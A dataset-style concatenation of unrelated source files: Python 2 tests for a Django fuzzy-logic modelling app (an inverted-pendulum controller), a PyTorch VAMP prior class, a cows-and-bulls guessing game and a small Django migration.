from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
angle = InputVariable(fuzzify=Plain(),description='angle',min=0.,max=360.,unit='degrees')
system.variables['Phi'] = angle
angle.adjectives['up_more_right'] = Adjective(Polygon([(0.,0.),(30.,1.),(60.,0.)]))
angle.adjectives['up_right'] = Adjective(Polygon([(30.,0.),(60.,1.),(90.,0.)]))
angle.adjectives['up'] = Adjective(Polygon([(60.,0.),(90.,1.),(120.,0.)]))
angle.adjectives['up_left'] = Adjective(Polygon([(90.,0.),(120.,1.),(150.,0.)]))
angle.adjectives['up_more_left'] = Adjective(Polygon([(120.,0.),(150.,1.),(180.,0.)]))
angle.adjectives['down_more_left'] = Adjective(Polygon([(180.,0.),(210.,1.),(240.,0.)]))
angle.adjectives['down_left'] = Adjective(Polygon([(210.,0.),(240.,1.),(270.,0.)]))
angle.adjectives['down'] = Adjective(Polygon([(240.,0.),(270.,1.),(300.,0.)]))
angle.adjectives['down_right'] = Adjective(Polygon([(270.,0.),(300.,1.),(330.,0.)]))
angle.adjectives['down_more_right'] = Adjective(Polygon([(300.,0.),(330.,1.),(360.,0.)]))
angle_velocity = InputVariable(fuzzify=Plain(),description='angle velocity',min=-600.,max=600.,unit='degrees per second')
system.variables['dPhi_dT'] = angle_velocity
angle_velocity.adjectives['cw_fast'] = Adjective(Polygon([(-600.,1.),(-300.,0.)]))
angle_velocity.adjectives['cw_slow'] = Adjective(Polygon([(-600.,0.),(-300.,1.),(0.,0.)]))
angle_velocity.adjectives['stop'] = Adjective(Polygon([(-300.,0.),(0.,1.),(300.,0.)]))
angle_velocity.adjectives['ccw_slow'] = Adjective(Polygon([(0.,0.),(300.,1.),(600.,0.)]))
angle_velocity.adjectives['ccw_fast'] = Adjective(Polygon([(300.,0.),(600.,1.)]))
position = InputVariable(fuzzify=Plain(),description='position',min=-20.,max=20.,unit='meter')
system.variables['X'] = position
position.adjectives['left_far'] = Adjective(Polygon([(-20.,1.),(-10.,0.)]))
position.adjectives['left_near'] = Adjective(Polygon([(-20.,0.),(-5.,1.),(0.,0.)]))
position.adjectives['stop'] = Adjective(Polygon([(-5.,0.),(0.,1.),(5.,0.)]))
position.adjectives['right_near'] = Adjective(Polygon([(0.,0.),(5.,1.),(20.,0.)]))
position.adjectives['right_far'] = Adjective(Polygon([(10.,0.),(20.,1.)]))
velocity = InputVariable(fuzzify=Plain(),description='velocity',min=-10.,max=10.,unit='meter per second')
system.variables['dX_dT'] = velocity
velocity.adjectives['left_fast'] = Adjective(Polygon([(-10.,1.),(-5.,0.)]))
velocity.adjectives['left_slow'] = Adjective(Polygon([(-10.,0.),(-2.,1.),(0.,0.)]))
velocity.adjectives['stop'] = Adjective(Polygon([(-2.,0.),(0.,1.),(2.,0.)]))
velocity.adjectives['right_slow'] = Adjective(Polygon([(0.,0.),(2.,1.),(10.,0.)]))
velocity.adjectives['right_fast'] = Adjective(Polygon([(5.,0.),(10.,1.)]))
acceleration = OutputVariable(defuzzify=COG,description='acceleration',min=-50.,max=50.,unit='meter per second^2')
system.variables['a'] = acceleration
acceleration.adjectives['left_fast'] = a_left_fast = Adjective(Polygon([(-50.,0.),(-20.,1.),(-10.,0.)]),COM=COM)
acceleration.adjectives['left_slow'] = a_left_slow = Adjective(Polygon([(-20.,0.),(-10.,1.),(0.,0.)]),COM=COM)
acceleration.adjectives['stop'] = a_stop = Adjective(Polygon([(-10.,0.),(0.,1.),(10.,0.)]),COM=COM)
acceleration.adjectives['right_slow'] = a_right_slow = Adjective(Polygon([(0.,0.),(10.,1.),(20.,0.)]),COM=COM)
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
from fuzzy.Rule import Rule
from fuzzy.norm.Max import Max
#from fuzzy.norm.Min import Min
#from fuzzy.norm.BoundedDifference import BoundedDifference
#from fuzzy.norm.DrasticSum import DrasticSum
from fuzzy.norm.EinsteinSum import EinsteinSum
from fuzzy.norm.DombiUnion import DombiUnion
from fuzzy.operator.Compound import Compound
from fuzzy.operator.Input import Input
from fuzzy.operator.Not import Not
system.rules['stop'] = Rule(
adjective=a_stop,
# it gets its value from here
operator=Compound(
Max(),
Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["up"]),
Input(system.variables["dPhi_dT"].adjectives["stop"])
),
Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["up_right"]),
Input(system.variables["dPhi_dT"].adjectives["ccw_slow"])
),
Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["up_left"]),
Input(system.variables["dPhi_dT"].adjectives["cw_slow"])
)
),
CER=CER
)
system.rules['tilts right'] = Rule(
adjective=a_right_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Not(
Compound(
AlgebraicProduct(),
Compound(
AlgebraicSum(),
Input(system.variables["X"].adjectives["left_near"]),
Input(system.variables["X"].adjectives["left_far"])
),
Compound(
EinsteinSum(),
Input(system.variables["dX_dT"].adjectives["left_slow"]),
Input(system.variables["dX_dT"].adjectives["left_fast"])
)
),
),
Input(system.variables["Phi"].adjectives["up_right"])
),
CER=CER
)
system.rules['tilts left'] = Rule(
adjective=a_left_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Not(
Compound(
AlgebraicProduct(),
Compound(
AlgebraicSum(),
Input(system.variables["X"].adjectives["right_near"]),
Input(system.variables["X"].adjectives["right_far"])
),
Compound(
DombiUnion(0.25),
Input(system.variables["dX_dT"].adjectives["right_slow"]),
Input(system.variables["dX_dT"].adjectives["right_fast"])
)
),
),
Input(system.variables["Phi"].adjectives["up_left"])
),
CER=CER
)
system.rules['far right'] = Rule(
adjective=a_right_fast,
# it gets its value from here
operator=Input(system.variables["Phi"].adjectives["up_more_right"]),
CER=CER
)
system.rules['far left'] = Rule(
adjective=a_left_fast,
# it gets its value from here
operator=Input(system.variables["Phi"].adjectives["up_more_left"]),
CER=CER
)
system.rules['accelerate cw if down'] = Rule(
adjective=a_right_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["down"]),
Compound(
AlgebraicProduct(),
Input(system.variables["dPhi_dT"].adjectives["cw_slow"]),
Input(system.variables["dPhi_dT"].adjectives["cw_slow"]),
)
),
CER=CER
)
system.rules['accelerate ccw if down'] = Rule(
adjective=a_left_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["down"]),
Compound(
AlgebraicProduct(),
Input(system.variables["dPhi_dT"].adjectives["ccw_slow"]),
Input(system.variables["dPhi_dT"].adjectives["ccw_slow"]),
)
),
CER=CER
)
return system
def test_system_from_pyfuzzy(self):
" shoud return the correct corresponding Model for the pyfuzzy object "
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
self._test_new_vs_expected_fuzzy_sysem(new_pyfuzzy_system, pyfuzzy_system_expected)
def _test_new_vs_expected_fuzzy_sysem(self, new_pyfuzzy_system, pyfuzzy_system_expected):
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
for var_name, var in pyfuzzy_system_expected.variables.items():
new_var = new_pyfuzzy_system.variables[var_name]
self.assertIsInstance(new_var, var.__class__)
self.assertEquals(new_var.description, var.description)
self.assertEquals(new_var.min, var.min)
self.assertEquals(new_var.max, var.max)
self.assertEquals(new_var.unit, var.unit)
for adj_name, adj in var.adjectives.items():
new_adj = var.adjectives[adj_name]
self._test_adj(adj, new_adj)
#: is input
if hasattr(var, 'fuzzify'):
self._test_fuzzify(var.fuzzify, new_var.fuzzify)
#: output
else:
self._test_defuzzify(var.defuzzify, new_var.defuzzify)
# import pdb; pdb.set_trace()
var_value = var.getValue()
new_var_value = new_var.getValue()
# if var_value != new_var_value:
self.assertEquals(new_var_value, var_value)
for rule_name, rule in pyfuzzy_system_expected.rules.items():
new_rule = new_pyfuzzy_system.rules[rule_name]
self._test_rule(rule, new_rule)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
def _test_rules_adj_in_out_adjs(self, system):
"test if all the rules's adj are the same instance of an output adj"
outputs_adjs = []
for var_name, var in system.variables.items():
#: is output
if not hasattr(var, 'fuzzify'):
for adj_name, adj in var.adjectives.items():
outputs_adjs.append(adj)
for rule_name, rule in system.rules.items():
self.assertIn(rule.adjective, outputs_adjs)
def _test_adj(self, adj, new_adj):
" test only a given adjective "
self.assertIsInstance(new_adj, adj.__class__)
self._test_set(adj.set, new_adj.set)
if adj.COM is not None and new_adj.COM is not None:
self._test_norm(adj.COM, new_adj.COM)
membership = adj.getMembership()
new_membership = new_adj.getMembership()
# if membership != new_membership:
# import pdb; pdb.set_trace()
self.assertEquals(
membership,
new_membership,
msg="%s != %s in %s" % (membership, new_membership, adj)
)
def _test_set(self, set, new_set):
" test only a given set "
self.assertIsInstance(new_set, set.__class__)
params = []
try:
for arg in inspect.getargspec(set.__init__).args:
if arg != 'self':
params.append(arg)
# will raise this exception when the given type don't implement a __init__ function
# (never overrided the object.__init__)
except TypeError:
pass
for param_name in params:
arg = getattr(set, param_name)
new_arg = getattr(new_set, param_name)
self.assertEquals(new_arg, arg)
cog = None
new_cog = None
try:
cog = set.getCOG()
except Exception, e:
# self.assertRaises(Exception, new_set.getCOG)
self.assertRaisesMessage(Exception, e.message, new_set.getCOG)
else:
new_cog = new_set.getCOG()
self.assertEquals(new_cog, cog)
self.assertEquals(new_set.points, set.points)
def _test_norm(self, norm, new_norm):
" test only a given norm "
self.assertIsInstance(new_norm, norm.__class__)
params = []
try:
for arg in inspect.getargspec(norm.__init__).args:
if arg != 'self':
params.append(arg)
# will raise this exception when the given type don't implement a __init__ function
# (never overrided the object.__init__)
except TypeError:
pass
for param_name in params:
arg = getattr(norm, param_name)
new_arg = getattr(new_norm, param_name)
self.assertEquals(new_arg, arg)
self.assertEquals(new_norm.UNKNOWN, norm.UNKNOWN)
self.assertEquals(new_norm.T_NORM, norm.T_NORM)
self.assertEquals(new_norm.S_NORM, norm.S_NORM)
def _test_fuzzify(self, fuzzify, new_fuzzify):
" test only a given fuzzify "
self.assertIsInstance(new_fuzzify, fuzzify.__class__)
def _test_defuzzify(self, defuzzify, new_defuzzify):
" test only a given fuzzify "
self.assertIsInstance(new_defuzzify, defuzzify.__class__)
params = []
try:
for arg in inspect.getargspec(defuzzify.__init__).args:
if arg != 'self' and arg != 'INF' and arg != 'ACC':
params.append(arg)
# will raise this exception when the given type don't implement a __init__ function
# (never overrided the object.__init__)
except TypeError:
pass
for param_name in params:
arg = getattr(defuzzify, param_name)
new_arg = getattr(new_defuzzify, param_name)
self.assertEquals(new_arg, arg)
self._test_norm(defuzzify.INF, new_defuzzify.INF)
self._test_norm(defuzzify._INF, new_defuzzify._INF)
self._test_norm(defuzzify.ACC, new_defuzzify.ACC)
self._test_norm(defuzzify._ACC, new_defuzzify._ACC)
def _test_rule(self, rule, new_rule):
"test only a given rule"
self.assertIsInstance(new_rule, rule.__class__)
self.assertEquals(rule.certainty, new_rule.certainty)
self._test_adj(rule.adjective, new_rule.adjective)
self._test_norm(rule.CER, new_rule.CER)
self._test_norm(rule.CER, new_rule.CER)
self._test_operator(rule.operator, new_rule.operator)
def _test_operator(self, operator, new_operator):
"test only a given rule"
self.assertIsInstance(new_operator, operator.__class__)
if operator.__class__.__name__ == 'Compound':
self._test_norm(operator.norm, new_operator.norm)
for i_inputs in xrange(0, len(operator.inputs)):
inp = operator.inputs[i_inputs]
new_inp = new_operator.inputs[i_inputs]
self._test_operator(inp, new_inp)
elif operator.__class__.__name__ == 'Const':
self.assertEquals(new_operator.value, operator.value)
elif operator.__class__.__name__ == 'Input':
self._test_adj(operator.adjective, new_operator.adjective)
elif operator.__class__.__name__ == 'Not':
self._test_operator(operator.input, new_operator.input)
op_call = operator()
new_op_call = new_operator()
self.assertEquals(
op_call,
new_op_call,
msg="%s != %s in %s" % (op_call, new_op_call, operator)
)
def test_set_only(self):
" should return the correct outout when only changing the set to a SetModel in th System "
from fuzzy_modeling.models import AdjectiveModel
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
COM = AlgebraicSum()
a_stop = Adjective(Polygon([(-10., 0.), (0., 1.), (10., 0.)]), COM=COM)
a_stop.name = 'stop'
new_a_stop = AdjectiveModel.from_pyfuzzy(a_stop).get_pyfuzzy()
new_pyfuzzy_system.variables['a'].adjectives['stop'] = new_a_stop
self._test_new_vs_expected_fuzzy_sysem(new_pyfuzzy_system, pyfuzzy_system_expected)
def test_output_variable_only(self):
" should return the correct outout when only changing the outputvar to a OutputVariableModel in th System "
from fuzzy_modeling.models import OutputVariableModel
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
from fuzzy.defuzzify.COG import COG
from fuzzy.OutputVariable import OutputVariable
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
COG = COG(INF=INF, ACC=ACC, failsafe=0., segment_size=0.5)
acceleration = OutputVariable(
defuzzify=COG,
description='acceleration',
min=-50.,
max=50.,
unit='meter per second^2')
acceleration.adjectives['left_fast'] = a_left_fast = Adjective(Polygon([(-50.,0.),(-20.,1.),(-10.,0.)]),COM=COM)
acceleration.adjectives['left_slow'] = a_left_slow = Adjective(Polygon([(-20.,0.),(-10.,1.),(0.,0.)]),COM=COM)
acceleration.adjectives['stop'] = a_stop = Adjective(Polygon([(-10.,0.),(0.,1.),(10.,0.)]),COM=COM)
acceleration.adjectives['right_slow'] = a_right_slow = Adjective(Polygon([(0.,0.),(10.,1.),(20.,0.)]),COM=COM)
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
acceleration.name = 'a'
new_acceleration = OutputVariableModel.from_pyfuzzy(acceleration).get_pyfuzzy()
new_pyfuzzy_system.variables['a'] = acceleration
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertNotEquals(output_dict1['a'], output_dict2['a'])
def test_output_variable_changing_one_sets_only(self):
" should return the correct output when changing all the sets to the new instance of same value "
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
from fuzzy.defuzzify.COG import COG
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
COG = COG(INF=INF, ACC=ACC, failsafe=0., segment_size=0.5)
acceleration = new_pyfuzzy_system.variables['a']
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
new_pyfuzzy_system.variables['a'] = acceleration
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertNotEquals(output_dict1['a'], output_dict2['a'])
def test_output_variable_changing_one_set_and_rule(self):
" should return the correct output when changing all the sets to the new instance of same value, and changing the corresponding rule "
from fuzzy_modeling.models import OutputVariableModel
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
from fuzzy.defuzzify.COG import COG
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
COG = COG(INF=INF, ACC=ACC, failsafe=0., segment_size=0.5)
acceleration = new_pyfuzzy_system.variables['a']
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
new_pyfuzzy_system.rules['far right'].adjective = a_right_fast
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
def test_rule_has_same_adjs_as_output_only(self):
" check if a rule has the same adjectives as the output"
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
self._test_rules_adj_in_out_adjs(pyfuzzy_system_expected)
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
def test_system_from_pyfuzzy_changing_a_single_rule(self):
"test if work changing a single rule"
from fuzzy.Rule import Rule
from fuzzy.operator.Input import Input
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
CER = AlgebraicProduct()
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
a_right_fast = new_pyfuzzy_system.variables["a"].adjectives["right_fast"]
far_right = Rule(
adjective=a_right_fast,
# it gets its value from here
operator=Input(new_pyfuzzy_system.variables["Phi"].adjectives["up_more_right"]),
CER=CER
)
new_pyfuzzy_system.rules['far right'] = far_right
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
        self.assertEqual(output_dict1['a'], output_dict2['a'])
def test_system_from_pyfuzzy_changing_a_single_rule_from_model(self):
"test if work changing a single rule, but from model"
from fuzzy_modeling.models import RuleModel
from fuzzy.Rule import Rule
from fuzzy.operator.Input import Input
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
CER = AlgebraicProduct()
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
system_model = SystemModel.from_pyfuzzy(self._createSystem())
output_a = new_pyfuzzy_system.variables["a"]
output_a.name = 'a'
a_right_fast = output_a.adjectives["right_fast"]
a_right_fast.name = 'right_fast'
far_right = Rule(
adjective=a_right_fast,
# it gets its value from here
operator=Input(new_pyfuzzy_system.variables["Phi"].adjectives["up_more_right"]),
CER=CER
)
far_right.name = 'far right'
rule_model = RuleModel.from_pyfuzzy(far_right, new_pyfuzzy_system, system_model)
new_rule = rule_model.get_pyfuzzy(new_pyfuzzy_system)
# new_rule.operator = Input(new_pyfuzzy_system.variables["Phi"].adjectives["up_more_right"])
new_pyfuzzy_system.rules['far right'] = new_rule
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
        self.assertEqual(output_dict1['a'], output_dict2['a'])
def test_system_from_pyfuzzy_with_other_input(self):
" shoud return the correct corresponding Model for the pyfuzzy object with another input"
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
import math
input_dict = {}
input_dict["X"] = 190.0 #: position [m]
input_dict["dX_dT"] = 500.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(270.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(90.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
        self.assertEqual(output_dict1['a'], output_dict2['a'])
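
    # Note: the round-trip exercised throughout these tests is
    #   SystemModel.from_pyfuzzy(system).get_pyfuzzy()
    # i.e. serialise a pyfuzzy System into the Django models and rebuild it,
    # then assert both systems compute identical outputs for the same input.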
| 2.703125 | 3 |
markovdwp/priors/vamp.py | ivannz/MarkovDWP | 0 | 12797981 | <gh_stars>0
import math
import torch
class VAMP(torch.nn.Module):
"""Varational Mixture of Posteriors prior by <NAME> Welling (2017).
URL
---
https://arxiv.org/abs/1705.07120
"""
def __init__(self, encoder, n_sample=50):
super().__init__()
self.encoder = encoder
# pseudoinputs
self.pseudoinputs = torch.nn.Parameter(
torch.Tensor(n_sample, *encoder.input_shape)
)
self.reset_pseudoinputs()
def reset_pseudoinputs(self):
self.pseudoinputs.data.normal_(mean=0., std=0.01)
@property
def event_shape(self):
return self.encoder.event_shape
def rsample_from_index(self, index):
"""Draw diffenretiable variates from VAMP modes specified by `index`.
"""
q = self.encoder(self.pseudoinputs[index.flatten()])
return q.rsample().reshape(*index.shape, *self.event_shape)
def rsample(self, sample_shape):
r"""Draw diffenretiable variates from VAMP.
Details
-------
Since VAMP is $\pi(z) = \frac1K \sum_k q(z\mid u_k)$, i.e. the mixture
        probabilities are uniform and fixed, there is no need for REINFORCE.
"""
if not isinstance(sample_shape, torch.Size):
sample_shape = torch.Size(sample_shape)
# index is uniformly random, and not learnable, thus no need to backprop
# through it and hence no need for reinforce gradients
index = torch.randint(len(self.pseudoinputs),
size=(sample_shape.numel(),))
return self.rsample_from_index(index.reshape(*sample_shape))
@torch.no_grad()
def sample(self, sample_shape):
"""Generate a `sample_shape` shaped sample from VAMP."""
return self.rsample(sample_shape)
def log_prob(self, value):
r"""Differentiable log-probability of the VAMP prior.
Details
-------
        VAMP prior (Variational Mixture of Posteriors) is a variant of an
        empirical Bayes prior learnt along with the VAE from the data. It is
        the following mixture $
        \pi(z) = \tfrac1K \sum_k q(z \mid u_k)
        $ where $q(z|x)$ is the approximate posterior represented by the
        encoder network (with some distribution on output) and $u_k$ are
        learnable `pseudoinputs` that determine the modes of the prior.
The log-probability is log-sum-exp of log-probs of the VAE's encoder at
each pseudoinput:
$$
\log \pi(z)
= \log \Bigl(
\sum_k \exp{ \{
\log q(z\mid u_k)
\} }
\Bigr) - \log K
\,. $$
"""
n_dim = len(self.event_shape)
assert value.shape[-n_dim:] == self.event_shape
# q has batch_shape `n_sample` (q_k(z) = q(z \mid u_k))
q = self.encoder(self.pseudoinputs)
# broadcast value so that `log_q` has shape `*batch_shape x n_sample`,
# where `batch_shape` is the leading dimensions of `value`
log_q = q.log_prob(value.unsqueeze(-n_dim-1))
# vamp is \tfrac1K \sum_k q(z \mid u_k)
# log-sum-exp-average along the pseudoinput dimension
return log_q.logsumexp(dim=-1) - math.log(len(self.pseudoinputs))
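
# --- Usage sketch (not part of the original module) ---------------------
# VAMP only assumes the encoder exposes `input_shape` / `event_shape` and
# returns a torch distribution from forward(); the toy Gaussian encoder
# below is made up purely for illustration.
if __name__ == '__main__':
    class ToyEncoder(torch.nn.Module):
        input_shape = (8,)
        event_shape = (2,)

        def __init__(self):
            super().__init__()
            self.loc = torch.nn.Linear(8, 2)

        def forward(self, x):
            loc = self.loc(x)
            # diagonal Gaussian posterior with unit scale
            return torch.distributions.Independent(
                torch.distributions.Normal(loc, torch.ones_like(loc)), 1)

    prior = VAMP(ToyEncoder(), n_sample=10)
    z = prior.rsample((4,))
    print(z.shape, prior.log_prob(z).shape)  # torch.Size([4, 2]) torch.Size([4])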
| 2.71875 | 3 |
09-revisao/practice_python/cows_and_bulls.py | lcnodc/codes | 1 | 12797982 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Exercise 18: Cows And Bulls
Create a program that will play the “cows and bulls” game with the user.
The game works like this:
Randomly generate a 4-digit number. Ask the user to guess a 4-digit
number.
For every digit that the user guessed correctly in the correct place,
they have a “cow”. For every digit the user guessed correctly in the
wrong place is a “bull.” Every time the user makes a guess, tell them
how many “cows” and “bulls” they have. Once the user guesses the correct
number, the game is over.
Keep track of the number of guesses the user makes throughout the game
and tell the user at the end.
Say the number generated by the computer is 1038. An example interaction
could look like this:
Welcome to the Cows and Bulls Game!
Enter a number:
>>> 1234
2 cows, 0 bulls
>>> 1256
1 cow, 1 bull
Until the user guesses the number.
"""
import random
def get_secret_number():
""" Define the secret number and write it to a file.
"""
secret_number = str(random.randint(1000, 9999))
with open("secret_number.txt", "w") as file:
print(secret_number, file=file)
return secret_number
def get_cows_and_bulls(secret, user):
    """Calculate the number of cows and bulls.

    A cow is a correct digit in the correct place; a bull is a correct
    digit in the wrong place. Each secret digit is counted at most once.
    """
    cows = bulls = 0
    secret_chars = secret
    # first pass: cows, removing exact matches from the pool of digits
    for i in range(len(secret)):
        if user[i] == secret[i]:
            cows += 1
            secret_chars = remove_char(secret_chars, user[i])
    # second pass: bulls, i.e. remaining guessed digits found elsewhere
    for i in range(len(secret)):
        if user[i] != secret[i] and user[i] in secret_chars:
            bulls += 1
            secret_chars = remove_char(secret_chars, user[i])
    return cows, bulls
def remove_char(s, c):
"""Remove a char of the string.
When a user character exist in a secret_chars, add 1 to bulls and
remove it of secret_chars to don't duplicate the count
"""
list_chars = list(s)
list_chars.remove(c)
return "".join(list_chars)
if __name__ == "__main__":
guessed = False
attempts = 0
secret = get_secret_number()
while not guessed:
user = input("Guess a 4-digit number: ")
attempts += 1
if user == secret:
guessed = True
print("%i cows, %i bulls" % (get_cows_and_bulls(secret, user)))
print(
"Congrats! The number is %s. You did %s attempts." %
(secret, attempts))
| 4.375 | 4 |
finliveapp/migrations/0028_gasmeasurement_unique gas measurement.py | FinLiveRI/FinLiveApp | 0 | 12797983 | <reponame>FinLiveRI/FinLiveApp<filename>finliveapp/migrations/0028_gasmeasurement_unique gas measurement.py
# Generated by Django 3.2.4 on 2021-12-14 11:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finliveapp', '0027_gassystem_wind_direction'),
]
operations = [
migrations.AddConstraint(
model_name='gasmeasurement',
constraint=models.UniqueConstraint(fields=('equipment', 'start_time'), name='unique gas measurement'),
),
